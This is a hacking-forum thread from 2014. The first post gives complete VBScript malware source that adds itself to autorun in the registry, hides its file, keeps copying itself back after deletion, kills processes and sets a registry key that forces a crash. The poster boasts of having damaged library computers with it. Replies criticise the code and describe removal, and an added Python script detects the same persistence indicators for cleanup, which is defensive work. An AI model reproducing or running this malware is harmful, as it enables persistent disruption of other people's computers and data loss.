I am back with a vbscript trojan


Post by Th3_M4d_H4tt3r on Sun Jan 12, 2014 3:46 pm

Hey, so I have been working on this trojan that makes its own startup registry, hides itself, it even has an antidelete :twisted: function, that makes sure it stays on the system even if you find and delete the file. Its payload causes you to have a blue screen. It took me a while to code this virus but I hope you guys will love it :)
Code:
' Y U No.vbs, coded by th3m4dh4tt3r
Set shell = CreateObject("WScript.Shell")
thisScript = Wscript.ScriptFullName

Function Install()
shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\StartMenu",thisScript,"REG_SZ"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile(thisScript)
objFile.Attributes = 2
End Function

Function AntiDelete()
Dim FSO
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CopyFile thisScript, "C:\Windows\Y U NO.vbs"
FSO.CopyFile "C:\Windows\Y U NO.vbs", thisScript
Set FSO = nothing
End Function

Function CheckTime()
If Time = "9:??:?? PM" Then
  Call Kill()
End If
End Function

Function Kill()
msgbox "U dun goofed, it is sleepy time for your computer.",1,"THEGAME"
shell.Run ("get-process | stop-process -force")
shell.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters\CrashOnCtrlScroll", "1", "REG_DWORD"
End Function

Install()

While 1 = 1
WScript.Sleep(1000)
AntiDelete()
CheckTime()
WEnd
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv


Re: I am back with a vbscript trojan

Post by centip3de on Mon Jan 13, 2014 12:45 pm

Th3_M4d_H4tt3r wrote:Hey, so I have been working on this trojan that makes its own startup registry, hides itself, it even has an antidelete :twisted: function, that makes sure it stays on the system even if you find and delete the file. Its payload causes you to have a blue screen. It took me a while to code this virus but I hope you guys will love it :)


First off, a virus and a trojan are not interchangeable terms. Secondly, this is not a trojan. A trojan (which derives from the famous trojan horse in ancient Greece) is a program that appears to be one thing, but is actually a RAT, or your stealing data, or what have you (e.g. back in ancient Greek times, it appeared as though the trojans had given them the gift of a giant wooden horse, but it was actually just a place to hold the Trojan soldiers so they could slaughter the Greeks). An example program would be one that appears to be an antivirus, but is actually just malicious code to steal credit cards. This is not that. This is just an annoying program that shuts down the computer once in a while.

Anywho, onto the actual criticisms:
1. This is a trivial program to get around. Simply end the process and delete it.
2. Or, if you want to be creative, I believe changing the system time would also stop it.
3. I'm not exactly sure why you forced a BSOD rather than just restarting/shutting-down the computer.
4. I can't actually comment on the quality of the code, because I don't know VBScript, but I can't say the indentation/formatting is all that great.

3/10 would not love.


Re: I am back with a vbscript trojan

Post by hellow533 on Mon Jan 13, 2014 2:31 pm

centip3de wrote:
Th3_M4d_H4tt3r wrote:Hey, so I have been working on this trojan that makes its own startup registry, hides itself, it even has an antidelete :twisted: function, that makes sure it stays on the system even if you find and delete the file. Its payload causes you to have a blue screen. It took me a while to code this virus but I hope you guys will love it :)


First off, a virus and a trojan are not interchangeable terms. Secondly, this is not a trojan. A trojan (which derives from the famous trojan horse in ancient Greece) is a program that appears to be one thing, but is actually a RAT, or your stealing data, or what have you (e.g. back in ancient Greek times, it appeared as though the trojans had given them the gift of a giant wooden horse, but it was actually just a place to hold the Trojan soldiers so they could slaughter the Greeks). An example program would be one that appears to be an antivirus, but is actually just malicious code to steal credit cards. This is not that. This is just an annoying program that shuts down the computer once in a while.

Anywho, onto the actual criticisms:
1. This is a trivial program to get around. Simply end the process and delete it.
2. Or, if you want to be creative, I believe changing the system time would also stop it.
3. I'm not exactly sure why you forced a BSOD rather than just restarting/shutting-down the computer.
4. I can't actually comment on the quality of the code, because I don't know VBScript, but I can't say the indentation/formatting is all that great.

3/10 would not love.

And in case he is actually stupid enough to mass email this, or send it any other way, I sent the code into Symantec and McAfee. Just because I already know I dislike OP. Might be because he did anything in Visual Basic.

As for OP,
1: There's always a way to delete it. Always.
2: There isn't even anything stopping me from editing the file in regedit as far as I can tell, meaning I could just make it into garbage and then delete it.
3: If I do gain access to the file where I can read it, it's blatantly obvious where else it writes.
4: Time designation is per read by the end user, meaning it does not cover military set time.
5: The majority of the code is sloppy and pointless.

I don't know why you even bothered.
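Added example, not part of the original thread: a small static triage script that lists the persistence and hiding indicators the replies above point to (autorun registry writes, the hidden file attribute, self-copy targets) in a VBScript source. The sample input is constructed and only modelled on the calls in the posted script; the function and pattern names are this example's own.

```python
import re

# Constructed sample modelled on the calls in the posted script (not a copy of it).
SAMPLE = r'''
Set shell = CreateObject("WScript.Shell")
shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Example", WScript.ScriptFullName, "REG_SZ"
objFile.Attributes = 2
FSO.CopyFile thisScript, "C:\Windows\example.vbs"
shell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters\CrashOnCtrlScroll", "1", "REG_DWORD"
'''

HIVES = {"HKCU": "HKEY_CURRENT_USER", "HKLM": "HKEY_LOCAL_MACHINE"}
REGWRITE = re.compile(r'\.RegWrite\s*\(?\s*"([^"]+)"', re.I)
COPYFILE = re.compile(r'\.CopyFile\s*\(?\s*[^,]+,\s*"([^"]+)"', re.I)
ATTRS = re.compile(r'\.Attributes\s*=\s*(\d+)', re.I)
AUTORUN = re.compile(r'\\CurrentVersion\\Run(Once)?\\', re.I)

def normalize(key):
    """Expand HKCU/HKLM abbreviations so findings compare consistently."""
    hive, _, rest = key.partition("\\")
    return HIVES.get(hive.upper(), hive.upper()) + "\\" + rest

def triage(source):
    """Return (line_no, kind, detail) for each persistence/hiding indicator."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        code = line.strip()
        if code.startswith("'") or code.lower().startswith("rem "):
            continue  # skip VBScript comment lines
        for m in REGWRITE.finditer(code):
            key = normalize(m.group(1))
            kind = "autorun" if AUTORUN.search(key) else "registry-write"
            findings.append((no, kind, key))
        for m in COPYFILE.finditer(code):
            findings.append((no, "file-copy", m.group(1)))
        for m in ATTRS.finditer(code):
            if int(m.group(1)) & 2:  # FileSystemObject attribute bit 2 = Hidden
                findings.append((no, "hidden-attribute", m.group(1)))
    return findings

if __name__ == "__main__":
    for no, kind, detail in triage(SAMPLE):
        print(f"line {no}: {kind}: {detail}")
```

Each finding names a location to check during cleanup: the autorun value to delete, the copy target to remove, and any other registry value to restore.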


Re: I am back with a vbscript trojan

Post by Goatboy on Mon Jan 13, 2014 7:15 pm

Heh, I remember this ass-jackal. He is famous for such threads as:

There's Something About Crypto
Honey, I Copied Some JavaScript
Honey I Copied Some JavaScript 2: DDoS Mishaps
"Deep" Web: My Love Affair with "Multy"-Threaded Python
And my personal favorite
Diary of a Mad Black 0day

And as per his sig, be sure to tip this genius.

Enjoy

<3


Re: I am back with a vbscript trojan

Post by Tentra on Mon Jan 13, 2014 8:04 pm

Goatboy wrote:Heh, I remember this ass-jackal. He is famous for such threads as:

There's Something About Crypto
Honey, I Copied Some JavaScript
Honey I Copied Some JavaScript 2: DDoS Mishaps
"Deep" Web: My Love Affair with "Multy"-Threaded Python
And my personal favorite
Diary of a Mad Black 0day

And as per his sig, be sure to tip this genius.

Enjoy

<3


I love your titles, Goatboy. You should write this guy's biography :P


Re: I am back with a vbscript trojan

Post by -Ninjex- on Mon Jan 13, 2014 8:07 pm

I think you guys are taking this a little too far.


Re: I am back with a vbscript trojan

Post by limdis on Mon Jan 13, 2014 8:08 pm

Hilarious.
Now, I'll be locking this thread with the next post that does not contain actual constructive criticism.


Re: I am back with a vbscript trojan

Post by Th3_M4d_H4tt3r on Mon Jan 20, 2014 7:57 pm

Goatboy wrote:Heh, I remember this ass-jackal. He is famous for such threads as:

There's Something About Crypto
Honey, I Copied Some JavaScript
Honey I Copied Some JavaScript 2: DDoS Mishaps
"Deep" Web: My Love Affair with "Multy"-Threaded Python
And my personal favorite
Diary of a Mad Black 0day

And as per his sig, be sure to tip this genius.

Enjoy

<3

please excuse me for my old and quite outdated `programming` :lol:
as most of that code is EXTREMELY shitty, I saved most of the good code for myself (EG: python base DrDoS exploit + hostlist)
I have been offline for quite a while, too busy with stupid shit like minecraft.
Meh, I'll quit that shit and start some REAL hacking again.
EDIT: that code was recovered from an old usb I found in my room, I'm pretty sure I coded it like 6 months ago at the library, and ruined a few computers XD


Re: I am back with a vbscript trojan

Post by fashizzlepop on Mon Jan 20, 2014 8:57 pm

Sounds like a really dickish thing to do to the poor library techs. Good job, douche.


Re: I am back with a vbscript trojan

Post by e3cb on Mon Jan 27, 2014 9:40 am

no/11, would not turn up.

